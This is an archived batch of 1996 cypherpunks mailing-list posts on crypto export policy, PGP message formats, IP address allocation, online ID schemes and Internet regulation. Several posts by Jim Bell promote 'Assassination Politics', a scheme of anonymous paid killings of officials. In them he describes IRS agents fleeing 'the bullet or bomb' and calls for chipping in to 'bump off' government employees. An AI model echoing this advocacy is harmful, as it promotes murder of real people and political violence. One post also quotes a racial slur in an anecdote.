Subject: Re: Stewart Baker's web site & OECD international crypto policy
Message-ID: <9602140047.AB19351@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


John Gilmore <gnu@toad.com> reported:


>My favorite was his summary report on the OECD meeting in December,
>~steptoe/286908.htm, at which the US tried to parade some of the
>fruits of its behind-the-scenes efforts to convince other governments
>to become as authoritarian as the US government on crypto policy.

Why help "potential enemies"?  Why a govt risks it's cherished 
'national security'?


>If the US government can quietly convince other countries to support
>Clipper-like systems (including "mandatory key escrow" and "trusted
     It probably means that they already cracked the code... :)

Definitely, they are insane beyond the safety level...

JFA
**** NEW PGP 2.6.2 KEY *********

2048 bits Key ID:24201BA1 1996/02/13 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  23 B6 24 31 86 67 FB 35  C7 A7 AF 12 A1 61 E9 3D 


**** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Tue, 13 Feb 96 20:32:38 PST
To: cypherpunks@toad.com
Subject: Re: Strange Sounds of Silence
In-Reply-To: <01I14KX2XSX4A0UZOC@mbcl.rutgers.edu>
Message-ID: <199602140431.UAA23868@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> From:	IN%"tallpaul@pipeline.com" 12-FEB-1996 00:47:35.36
> 
> >But I do not dismiss people as "lib'bers;" I merely call them that. I have
> >noticed that a large number of libertarians are fans of Rush Limbaugh and
> >chuckle a lot when Rush refers to women like Andrea Dworkin and her
> >supporters as lib'bers. I also find that the people opposed to Drowkin &
> >Co. are upset at her use of demagogic language, private dictionaries, and
> >the like. So am I, and started long before Rush got his TV shows. I am,
> >however, equally (if not more upset) by what I perceive as similar
> >demagogic etc. behavior by many libertarians. 
> 
> 	Large number of libertarians are fans of Rush Limbaugh? The last time
> I checked, Rush Limbaugh was basically a conservative populist like Pat
> Buchanan. While we may appreciate his comments re Andrea Dworkin (and others
> who want to restrict free speech on ridiculous grounds, and who believe
> nonsensical things like an inability to consent to sex), that doesn't mean
> we're fans of his. I like some of what Jefferson said, too, but that doesn't
> mean I agree with him on slave-holding (or on agrarianism).

Neither Rush Limbaugh or Pat Buchanan are populists.  Populists tend to
believe in strong government with strict regulation of business, an
actually progressive tax system, confiscation of businesses which break
the rules, government enterprise in competition with the private sector,
no secrecy in government of the type required in the private sector,
bias toward small businesses and sole proprietors, etc.
Letting business "do whatever they want", really doesn't qualify.
FWIU, Buchanan's only claim is opposition to "free trade"(forcing the US
to trade)

AFWIU, Jefferson didn't like slavery, and later freed his slaves,
but considered it necessary for business when he practiced it.
Have you worked at a job you didn't approve of?

> >Do they really have a right not to be styled "lib'bers?" No, I do not think
> >they have that right. 
> 
> 	Call us whatever you like. My problem with the term is that it's
> confusing. I doubt, for instance, that Rush Limbaugh is using it as an
> abbreviation for libertarian, although I'm not sure for what, if anything,
> it's a contraction.
> 
> >I do not believe that all lib'bers are in league with the Christian right;
> >I am distrubed, however, by the large numbers of lib'bers who strangely
> >never mention the existence of the fundamentalists in the
> >ultra-conservative ultra-private-property camp. 
> 
> 	Yes, the fundys are in there. Politics makes strange bedfellows; work
> with whoever you can on whatever you can agree on. It's sort of like both our
> and CPSR's opposition to the CDA - CPSR has entirely too many desires to
> regulate private property (free net access et al), but we can still work with
> them on what we agree on.
> 
> >I am equally concerned with some leftists who consider every example of
> >authoritarian behavior as "fascism" as I am with 'ib'bers who lump everyone
> >who argues for social responsibility as a "socialst statist." One
> >difference I see is that I am willing to criticize both groups while many
> >(but not all) lib'bers are again strangely silent at least the "statist"
> >side of the equation. 
>  
> 	Well, about 25% or so of libertarians are anarcho-capitalists, so far
> as I can tell. So of course they're going to find anyone who's advocating state
> control a "statist." They've agreed to disagree with people like me who aren't
> anarchists, but that's because we've got most other things in common.  
> 	-Allen
> 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Tue, 13 Feb 96 20:37:42 PST
To: "A. Padgett Peterson P.E. Information Security"	 <PADGETT%TCCSLR@emamv1.orl.mmc.com>
Subject: True democracy the electronic way
Message-ID: <v01530500ad47100dc99b@[204.179.169.44]>
MIME-Version: 1.0
Content-Type: text/plain


}Is ok. I suspect that we are narrowing on a similar position. Would like
}to see a time when net communications make "representatives of the people"
}obsolete" since majority voting on any issue can be "anytime,anywhere".
}Doubt that it will happen soon.

<rm>

I too would like to see a purely democratic process rather than a
representative one.  And I also agree that it won't happen soon.  The
question is, what do we keep of govt?

How would the group propose electronic voting on legislation should
proceed?  What sort of technical solution could be arrived at to allow
everyone in the country to vote on specific legislation and how would they
get access to that legislation?  I think _this_ is a cypherpunk topic for
sure.

}Take CDA (please) - obviously draconian and unconstitutional. Think how
}much more difficult it would be to overturn if worded more reasonably.
}Then ask if that was intentional 8*).

I have to believe that Exon truly meant to castrate the net, but in his own
zealous wording, made it easier to turn the law over.  I think it is
reasonable to hope that that will be the effect.  Our doing our part to
make enough noise about it will only help our cause.

lunaslide

"Prohibition... goes beyond the bounds of reason in that it attempts to
control a man's appetite by legislation and makes a crime out of things
that are not crimes... A prohibition law strikes a blow at the very
principles upon which our government was founded."
- -- Abraham Lincoln

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller
________________________________________________________________

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEX3QEAAAEEAOGQjhnqGH29pO1WDaXs5GFOVPhCBWyYEk9XEwRmscjveWzH
AhA6DeOA480zWNqQURyqE2yPmR8WzT+OXYqmeiQiycKyFA41Vs/Ruf+gXXxe7uXS
L5BK3K8oKbfoH0D5/TAkMT4r6BprXFQz4pFc3gY2SSaSPElpMjKHaKBsRsyRABEB
AAG0HUplZmYgQ29ubiA8bHVuYXNsaWRlQGxvb3AuY29tiQCVAwUQMRffHzKHaKBs
RsyRAQGNhwP9E9xEZ9/LCKnhgtnrqgD7pDoXG2pCy8FoyfFjoImGkG+jF1wELXmB
Z0mf8F8CgYkys0mif1XeGDMelr1gzlZAm6LgQt4kcvztMW/aRLn18QP+iwltVT/L
p8D37mitOjvuk46sWgAChIaPPPIeg/EaYQjQkmlpWKsEYIoTRy+E8mU=
=4Gku
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 13 Feb 96 21:42:09 PST
To: cypherpunks@toad.com
Subject: Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <m0tmZPD-000922C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:36 PM 2/13/96 -0800, Bill Frantz wrote:
>At  8:15 PM 2/13/96 -0500, Declan B. McCullagh wrote:

>>That may well be true, but speaking as someone who's worked on U.S.
>>Presidential campaigns, that kind of protection is expensive,
>>time-consuming, intrusive, and unlikely to be extended.
>
>I assume that both Declan and Jim Bell agree that people high in the
>government will be immune because they already enjoy this level of
>protection (limitation one).  So the only people we can hit are the cannon
>fodder, not the ones who gave the orders.  It has always been this way with
>war.

Actually, I think the primary targets will be either the middle level 
manager types, or the ones who have attracted a substantial amount of bad 
publicity by "following orders."  Lon Horiuchi (the sniper who shot Vicki 
Weaver) for example, would be a excellent example of a person who'd try to 
claim, "I was just following orders."  Okay, maybe he was, but so was Adolph 
Eichmann.  

Once the tax collectors/enforcers were targeted, the rest of the government 
wouldn't be able to operate, and would collapse.


>If, after a couple of the Waco people had been hit, I was given the
>responsibility to protect them I would proceed as follews:
>
>(1) Gather them and their families onto some Army base and step up the
>patrols.  Now I have them safe.

And, of course, you've just ruined their lives.  Think about it.  By doing 
this, it is made absolutely, completely, and abundantly clear to them that 
THEY are considered "the enemy" and that their lives are forever put at 
risk.   Previously, government employees could hold their heads up high and 
be proud of their "public service."  Now, if they're discovered, they have 
to disappear.  Does this treatment sound familiar?  Their job description 
and circumstances will more closely resemble that of a Mafia enforcer than a 
proud public servant.  They'll have to teach their children to lie about 
what their parent does, rather than risk getting exposed.

Who, exactly, would want to work for the government under such 
circumstances?  Remember, we're not just talking about a tiny fraction of 
their number; if the most egregious ones were hidden the ones that were less 
secure would be killed in their place.

Remember, the only reason the government can even afford so many employees 
is because taxes are collected; what happens when literally every IRS agent 
resigns to avoid the bullet or bomb?  The remainder, the "less bad" ones, 
couldn't be paid.  At that point, government collapses.


>(2) Train and release them thru the witness protection program.  Cost
>$20,000/person (if I remember the article John Young posted a pointer to
>correctly.  (Thanks John))  This is probably about the same as the cost of
>their training, so it makes economic sense.

Except that you can't do this for every government employee, and who's going 
to want to work for the government if it is made clear to them that someday 
they'll either be killed, or discovered, or they will have to "go 
underground" to survive.  Not a very good prospect.  And what happens if 
they think there's a fairly good chance that my system will succeed?  Most 
people want to be able to retire with a pension; what's the prospect for 
collecting a pension from a demolished government?!?

>
>(3) Make sure that the names/faces of the cannon fodder in future actions
>are not available to make it harder to target the guilty.
>
>Bill

Then they'll target the "names," the ones who show their faces.  See how this 
works?  If the only way  you can maintain the government is to keep them all 
absolutely anonymous, then that government has FAILED.

Furthermore, this system's anonymity allows disgruntled public employees the 
chance to collect money by "turning in" their bosses to the public's ire; if 
the personnel list for the government is nominally a secret, it will "leak" 
eventually and those on the list will be followed, confirmed, and targeted.

I'm not a betting man, but if I were forced to place a bet, your position 
doesn't have a prayer.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Tue, 13 Feb 96 18:09:34 PST
To: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC,    Canada))
Subject: Re: Stealth PGP work
In-Reply-To: <9602140048.AB19351@cti02.citenet.net>
Message-ID: <199602140209.VAA03693@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> It seems that there a market demand for a stealth-capable product.
> Many peoples here seems to discuss it.  And for the time being, AFAIK,
> this type of products are used by a specific class of peoples, most of
> which knows what 'stealth' means.
> 
> So why is it that they design a program that would not permit the use
> of a feature considered desirable by it's customer base?

The big question I have for you is, what do you mean by "stealth" PGP?
Do you want a PGP message which doesn't say to whom it is encrypted?
Or do you want a PGP message which does not even acknowledge that it
is a PGP message?  If what you want is the former, then that can fit
under the PGP API fairly well.  If you want the latter, it will not.

The reason is that PGP, by definition, is a self-describing packet
format.  Without that description there is no general way for the PGP
library to discover what kind of message it is parsing order to
perform the proper operation to open the message.  OTOH, if just the
keyID is missing, the library will happily try all the keys on your
secret keyring until one succeeds or they all fail (I'm not sure if
this is implemented, but it fits quite nicely under the API).

The other question I have is: who do you think the "customers" of PGP
are?  If you think the majority of PGP's customers are the
crypto-privacy activitst types, you are highly mistaken.  PGP has hit
the main stream, and is being used by many non-crypto-aware people.
Probably more of them than there are of us.

If you want to discuss this more, let's take it to private email,
please.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Tue, 13 Feb 96 20:04:25 PST
To: sunder@dorsai.dorsai.org (Ray Arachelian)
Subject: Re: Put the Protest where your money is.
In-Reply-To: <Pine.SUN.3.91.960213122532.19788A-100000@dorsai>
Message-ID: <960213.212846.8b1.rnr.w165w@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, sunder@dorsai.dorsai.org writes:

>
> On Mon, 12 Feb 1996, Mark Allyn (206) 860-9454 wrote:
>
>> What do you mean by a speech bubble?
>> 
>> "write in a speech bubble to the president dude"
>> 
>> Does this mean a transparent plastic bubble over his head??
>
> Like in comic books.  i.e:

I got a dollar bill yesterday with a rubber-stamped speech baloon saying
"I Grew Hemp" next to George's head.  First one I'd seen, so the
transmission layer isn't too crowded.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSFXjxvikii9febJAQHaDAP9HQ/Iqw0CLNmSEBXcduwK9Wa0WaY6N026
bYU9fpvKMd16JBuRQ7wvQ6/l9QUwY9KF6J/LEnrbKC3bdEl3E09kqCg0VyL0QJYq
4y8b4QqvfzIt/yecOSVRyo4v3pCZXKeqaHvWq8wJnnYanzpMUXHGLmBL6FohJzi+
SvoHC5qlp9M=
=S05W
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 13 Feb 96 18:35:29 PST
To: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC,   Canada))
Subject: Re: [off-topic] how to access the net from a sailboat in the pacific?
In-Reply-To: <9602140048.AB19351@cti02.citenet.net>
Message-ID: <199602140235.VAA22298@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jean-Francois Avon (JFA Technologies, QC, Canada) writes:
> Q3: how to make that connexion [from mid ocean] *secure*?

Ah, that part is easy. End to end encryption. IPsec or things like
it. I hope I don't sound like a preacher, but IPsec is a good thing(TM).

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 13 Feb 96 21:44:25 PST
To: "Declan B. McCullagh" <stend@grendel.texas.net>
Subject: Re: Spin Control Alert (LI Newsday, 2/12/96)
Message-ID: <199602140542.VAA18716@news1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:22 PM 2/13/96 -0500, Declan B. McCullagh wrote:
>I do hope the religious right keeps fighting against GAK. However good
>their intentions may be on *that* issue, it is transcendently obvious to
>anyone who has been following the flux on Capitol Hill that they were
>behind the recent push to regulate the Internet.

Not obvious to me.

While the religious right clearly supported the push to regulate the
internet, the main push seemed to me to come from the existing mass
media, primarily the three big TV channels.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Tue, 13 Feb 96 18:55:28 PST
To: cypherpunks@toad.com
Subject: Re: CyberAngels
Message-ID: <199602140254.VAA14288@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 12, 1996 23:23:59, 'ethridge@Onramp.NET (Allen B. Ethridge)' wrote: 
 
 
> 
>The Guardian Angels have decided to enter cyberspace and make it safe for 
>us all.  They have a FAQ on the web - http://www.safesurf.com/cyberangels/

>.  How is this relevant to cypherpunks?  From their FAQ: 
> 
> 
>"9) What kinds of changes would the Guardian Angels / CyberAngels like to
see? 
> 
>a) We would like to see an improvement in User identification. User ID is 
>impossible to verify or trace back. The very anonymity of Users is itself 
>causing an increase in rudeness, sexual abuse, flaming, and crimes like 
>pedophile activity. We the Net Users must take responsibility for the 
>problem ourselves. One of our demands is for more accountable User IDs on 
>the Net. When people are anonymous they are also free to be criminals. In
a 
>riot you see rioters wearing masks to disguise their true identity. The 
>same thing is happening online. We would like to see User ID much more 
>thoroughly checked by Internet Service Providers." 
> 
 
See: 
 
_Computer underground Digest_, "CyberAngels in Cyberspace," #8.04, 01/13/96

          (my original piece on the CyberAngels) 
_Computer underground Digest_, "CYBERANGELS," #8.06, 01/21/96 
          (the CyberAnels official response) 
_Computer underground Digest_.  [ENTIRE ISSUE]. #8.13, 02/06/96 
          (the readership responds) 
 
CuD is available as a Usenet newsgroup: comp.society.cu-digest 
 
Also, I have been corresponding with folks at _Wired_ who are picking up
the story, for their March issue I believe. 
 
On Feb 13, 1996 00:46:05, 'joseph@genome.wi.mit.edu (Joseph
Sokol-Margolis)' wrote: 
 
>not sure if this is the right place. 
>I agree with allen, about the issues of 'nym. But looking at other aspects

>of these cyberangels I'm unsure how to feel. On one hand they seem
resonable, 
>protecting only the children. ... 
 
The CyberAngels want to do *far* more than "protect only children." 
 
--tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 13 Feb 96 18:58:54 PST
To: alano@teleport.com (Alan Olsen)
Subject: Re: AT&T Public Policy Research -- hiring for cypherpunks
In-Reply-To: <2.2.32.19960213203230.00af30dc@mail.teleport.com>
Message-ID: <199602140303.WAA23346@homeport.org>
MIME-Version: 1.0
Content-Type: text


	IP addresses are a scarce resource today.  Try getting a /16
allocation (what used to be a class B).  There are politics in the
process already.

	Addresses will not be easily 'transferable.'  The IETF is
discussing a 'Best Current Practices' document that talks about
address portability.  Basically, it can't happen, because the routers
only have so much memory, and the routers at the core of the internet
can't keep in memory how to reach every one; there needs to be
aggregation.  The only feasible aggregation seems to be provider
based, ie, MCI, Alternet, and other large ISPs get blocks of
addresses.  They give them to smaller companies, like got.net, which
gives them to customers.  The result?  The core routers have a few
more years.

	Lastly, 32 bit addressing is going away.  IPv6 offers 128 bit
address space, and (hopefully) much more efficient allocation, as well
as such useful things as hooks for automatic renumbering of address space.

Adam


Alan Olsen wrote:
| >Markets for IP Addresses
| >
| >The 32-bit numbers used for Internet addressing and routing are a
| >limited resource. As this resource becomes scarcer, political
| >considerations are likely to creep into allocation decisions made
| >through existing administrative processes, leading to suboptimal
| >allocations. By granting transferable property rights to addresses,
| >allocation decisions can be removed from the political realm into the
| >economic realm, so that addresses are allocated to those who value them
| >most. This project seeks to develop consensus in the Internet community
| >for a move to market-based allocation, and investigates alternative
| >designs for an electronic market to coordinate the exchange of IP
| >addresses.
| 
| This proposal bothers me. I do not see any positive results from this
| proposal. (Or at least the negatives will far outweigh the positive.)
| 
| Here is what I see as the results of such a plan...
| 
| Getting an IP address will become prohibitivly expensive except for the
| largest megacorps.  Instead of solving the limitations of the current
| system, this plan will cause people to "invest" in IP addresses in the hope
| that the price will go up.  IP addresses will become part of a corporation's
| invenstment portfolio.  This will result in less usage of IP addresses, not


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 13 Feb 96 22:33:20 PST
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: Assasination Politics
Message-ID: <m0tmaQP-000941C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:48 PM 2/12/96 EDT, E. ALLEN SMITH wrote:
>	I have changed the subject header (despite its destroying threading
>with the way my mailreader works) so that Perry et al can more easily filter
>this out. I have concluded that Assasination Politics, since it is a possible
>development of true anonymnity, etcetera, is a proper discussion topic for
>cypherpunks - while not cryptography in and of itself, it is a possible result
>of cryptography.

I'm glad some people see that.  This may, in fact, turn out to be one of the 
most important products of modern, public-key cryptography.


>From:	IN%"frantz@netcom.com" 12-FEB-1996 03:24:07.29
>
>>Again, absolutely.  Hell, I can't even devise a filter that will let me
>>filter out Jim Bell's rants while letting me see his reasoned arguments on
>>anonymous assassination.  (I would love to have him address the Salman
>>Rushdie issue, a man who is still alive despite a considerable announced
>>price for his head.  There appear to be limits to who can be subject to
>>assassination for pay.)
>
>	Actually, that's an argument for non-misusage of Assasination Politics.
>If the person hides, there's not much one can do about it. But a hiding
>law enforcement agent can't be out violating people's rights. 

Bingo!   That's why this system will be so effective; it will DETER bad 
behavior on the part of the government and its agents.


>(I will mention
>that whether a right is violated or not is essentially a matter of the
>perceiver - under any system, whether governmental or not. All ethical
>arguments assume either some degree of common ground that can be argued from,
>or the finding of logical inconsistency). Those who do so via the net can be
>taken care of via the other mechanisms discussed here. It's just that the
>physical part is a possible net weakness.
>	Moreover, just because _some_ rights-violaters (not that Rushdie was
>one) aren't killed doesn't mean that all of them wouldn't be. A system doesn't
>have to be 100% efficient to be effective.

Yup; it's interesting that Franz didn't see this... Maybe he just didn't
WANT to see it!


>	However, the Rushdie case does bring up one problem I have with
>Assasination Politics as currently constructed. While people are unlikely to
>patronize a general/non-discriminatory organization, a more particular but
>non-libertarian one is still possible. For instance, if the Christian
>Coalition put together an organization, anonymously, what would prevent them
>from offing everyone who was a major leader against them - such as a doctor
>researching new abortion techniques, or a geneticist (such as myself) doing
>gene therapy work they found offensive? The patrons would know that _they_
>wouldn't be targeted after all... I would appreciate a response from Jim Bell
>on this subject.
>	-Allen

Your question was actually a two-parter.  I will separate it below and 
comment on the pieces:


>For instance, if the Christian
>Coalition put together an organization, anonymously, what would prevent them
>from offing everyone who was a major leader against them -

"Who needs leaders"?  Think about this, carefully.  The current political 
system is based on the idea that if you don't like the way things are being 
done, you have to publicize your unhappiness, to organize, and for that  you 
normally "need" leaders.  With "Assassination Politics," _leaders_ will not 
only not be necessary, they might be the prime targets for unhappy people!  
But this will work both ways:  "Christian Coalition" LEADERS will be targets 
themselves if they publicly advocate the killing of abortion doctors.


> such as a doctor
>researching new abortion techniques, or a geneticist (such as myself) doing
>gene therapy work they found offensive? 

I wish there was some sort of "perfect, easy solution" to this dilemma, but 
it's possible there isn't.  Ultimately, anybody who does anything that 
angers enough people, ENOUGH, will be a potential target.  I don't think 
this is a major admission however; society has ALWAYS been this way.  In the 
early 1600's in Salem, women were killed simply due to false accusations 
that they engaged in 'witchcraft."  Governments have prosecuted (and 
persecuted) people for violation of what we now call victimless crimes.  In 
the pre-1960's South, being black was a de-facto "crime":  They could be 
arrested, tried, and convicted on a pretense.  Over 60% of prison cells are 
filled with people who sold chemicals (drugs) to willing buyers.

I think it's clear that there are ALREADY plenty of violations of rights 
going on; at most, you can claim that "Assassination Politics" is 
"imperfect" in the sense that it doesn't completely solve this problem.  But 
since I do genuinely believe it will eliminate war, militaries, governments, 
taxes, and other evils, I think we'll end up with a far better society than 
we have today.

>The patrons would know that _they_
>wouldn't be targeted after all... I would appreciate a response from Jim Bell
>on this subject.

All is not lost, however.  I contend that society would likely IMPROVE to 
the point where the kind of behavior you want to avoid will not commonly 
happen.  Wishful thinking?  Well, consider a point which was driven home to 
me a week ago at a dinner with my parents, sister and brother in law, and my 
two nieces, ages 4 and 9.  We were eating spareribs, and my father (age 65) 
commented that such meat used to be considered trash meat, and "only the 
niggers bought it."  (BTW, my father was not and is not a bigot, quite the 
opposite; he used this terminology to relate the general opinion during the 
time frame he grew up in; he used this terminology to reflect on and deride 
that public opinion back then.) 

My older niece looked mystified, and said she hadn't even HEARD the term 
"nigger." (and she's substantially above average in vocabulary and 
intelligence for age 9, BTW)   While I am not going to claim that bigotry is 
dead in the younger generation, I think it's clear that it went out of style 
in the 1960's and progress has since been made in eradicating most of its 
more egregious effects. In short, in that issue, society has improved, if by 
no other method than waiting for the bigots to die off naturally and develop 
a new generation of more tolerant people.  Call this "political correctness" 
if you wish (and I'm about as much an opponent of "political correctness" as 
you'll find) but the fact is that things are getting better with regards to 
race relations.

Similarly, I think that once public advocacy for killing abortion doctors 
and others was deterred (by judicious use of Assassination Politics, for 
example, even if a given example of such use might be considered "wrong" 
because it was a violation of "free speech") 
pretty soon it would be hard to gather much enthusiasm for such bad acts.  
Few people would risk calling publicly for that; the next generation will 
"never" hear such a thing, etc. 

Is it unreasonable for me to suggest that over time, the faults you fear 
will tend to disappear?










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 13 Feb 96 22:33:28 PST
To: Rich Salz <cypherpunks@toad.com
Subject: Re:  MS CryptoAPI (fwd)
Message-ID: <m0tmaQV-00091sC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 07:28 PM 2/13/96 -0500, Rich Salz wrote:
>Okay, so how the hell did Microsoft get export approval for this? I mean,
>this is the classic crypto-with-a-hole; a service-provider interface (SPI)
>with DLL's means "plug your crypto here".  This is usually considered an
>"anciliary" device in ITAR language, and therefore export controlled.  I
>mean, how long until you see MSWord with "full privacy" option?
>
>Word I've heard is that the office of Export Control has had a lot of
>turnover and "nobody knows anything" anymore. 

At the risk of blowing my usual horn, I would argue that one advantage in 
vocal, common, and loudly hostile talk against government is that they have 
begun to understand how unhappy we are with them.  To make an analogy with 
late-1700's France,  the sound of a guillotine being tested probably had a 
remarkable effect on the upper strata of their society; likewise, dicussions 
of how we can all chip in and bump off the whole lot of the bastards might 
remind a few of they key government players that they are not immune from 
eventual retribution.  Resulting in "a lot of turnover."

If we make a "reasonable assumption" that most of those government employees 
aren't stupid, and they discover that the prospect for Crypto-Anarchy 
(trademark owned by Tim May?) is good, it seems reasonable to assume that 
they'll want to avoid being around when THE END comes for their employer.

Jim Bell

Klaatu Burada Nikto

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSF8vvqHVDBboB2dAQExXQP+JHO6P80VfXE1+x5JmstA14dg+wlmXBK2
+8UYUnD7IpK2QzIKoEbmot2/WfUK/9zzOiuRuXvzc6FxfscRm7xNzNO28vviTN5U
osVNgm72t/R2jZspMPr+cYE3GcxDIcQvTEOth5Tz9J9q7TfI4+NPl68fN7sqEOsG
m44PPIy6F2I=
=m3hQ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 13 Feb 96 22:59:17 PST
To: Adam Shostack <adam@homeport.org>
Subject: Re: AT&T Public Policy Research -- hiring for cypherpunks
Message-ID: <2.2.32.19960214070150.00af2350@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:03 PM 2/13/96 -0500, Adam Shostack wrote:
>	IP addresses are a scarce resource today.  Try getting a /16
>allocation (what used to be a class B).  There are politics in the
>process already.

I know they are getting scarce.  I just find the "let's sell IP addresses on
the open market" do be a scary though.  it will make them less available.

>	Addresses will not be easily 'transferable.'  The IETF is
>discussing a 'Best Current Practices' document that talks about
>address portability.  Basically, it can't happen, because the routers
>only have so much memory, and the routers at the core of the internet
>can't keep in memory how to reach every one; there needs to be
>aggregation.  The only feasible aggregation seems to be provider
>based, ie, MCI, Alternet, and other large ISPs get blocks of
>addresses.  They give them to smaller companies, like got.net, which
>gives them to customers.  The result?  The core routers have a few
>more years.

A good point. Having parts of subnet shifting around could be pretty painful
from an admin point of view.

>	Lastly, 32 bit addressing is going away.  IPv6 offers 128 bit
>address space, and (hopefully) much more efficient allocation, as well
>as such useful things as hooks for automatic renumbering of address space.

I just hope that the AT&T scheme does not get put into place.  Otherwise it
will be just viewed like a stock split.  ("Wow!  We have more addresses to
sell!")

The AT&T plan as described sounds like something dreamed up by a marketing
droid as a way to "Make Money Fast Off Of The Internet".

What is the timeline for implementation of IPv6?

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Tue, 13 Feb 96 21:25:42 PST
To: cypherpunks@toad.com
Subject: 1996-02-13 VP Gore Unveils On-Line Service for Businesses (fwd)
Message-ID: <Pine.3.89.9602132321.D10048-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Tue, 13 Feb 1996 22:28-0500
From: The White House <Publications-Admin@WhiteHouse.Gov>
To: Public-Distribution@CLINTON.AI.MIT.EDU
Subject: 1996-02-13 VP Gore Unveils On-Line Service for Businesses

 

                            THE WHITE HOUSE

                      Office of the Vice President

________________________________________________________________________
For Immediate Release                                  February 13, 1996


   VICE PRESIDENT UNVEILS NEWEST ON-LINE SERVICE FOR U.S. BUSINESSES
  Gore Says U.S. Business Advisor Key To Governing In Information Age


    Vice President Gore today (2/13) unveiled the a new and improved
"customer-designed" version of the U.S. Business Advisor.  The
"Advisor", which was first presented at the 1995 White House
Conference on Small Business, underwent a six-month redesign that
addressed the specific needs of the business community.  The improved
"Advisor" will provide users with one-stop electronic access to more
than 60 different federal organizations that assist or regulate
businesses.

	This on-line service, which directly links American businesses
with the federal government, was originally developed by the Vice
President's National Performance Review in cooperation with federal
agencies and the business community.

	Today, at the annual convention of the Armed Forces
Communications and Electronics Association (AFCEA) in Tyson's Corner,
VA, the Vice President officially placed the new Advisor on the World
Wide Web (http://www.business.gov).

	"By employing state-of-the-art information technology, the
Advisor is improving communication between American businesses and
their government," the Vice President said.  "Because this version was
developed with the support of the business community, the Advisor
serves our customers on their terms.  Both Fortune 500 companies and
start-up businesses will benefit from this improved service."

	The Advisor provides an interactive environment where
businesses can:  file documents electronically with the government;
retrieve documents, applications and other information; get answers to
commonly asked questions; obtain names and contact numbers of business
agencies; acquire news on specific business topics; and send feedback.

	The improved version of the U.S. Business Advisor was unveiled
today as the Vice President delivered the second of three speeches on
technology and the future of America.  The "Technology Trilogy" began
Monday (2/12), in Baltimore, MD, where the Vice President spoke to the
American Association for the Advancement of Science.  The final speech
is scheduled for tomorrow (2/14), in Philadelphia, PA, where the Vice
President will visit the first programmable computer, also known as the
ENIAC.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Tue, 13 Feb 96 21:40:08 PST
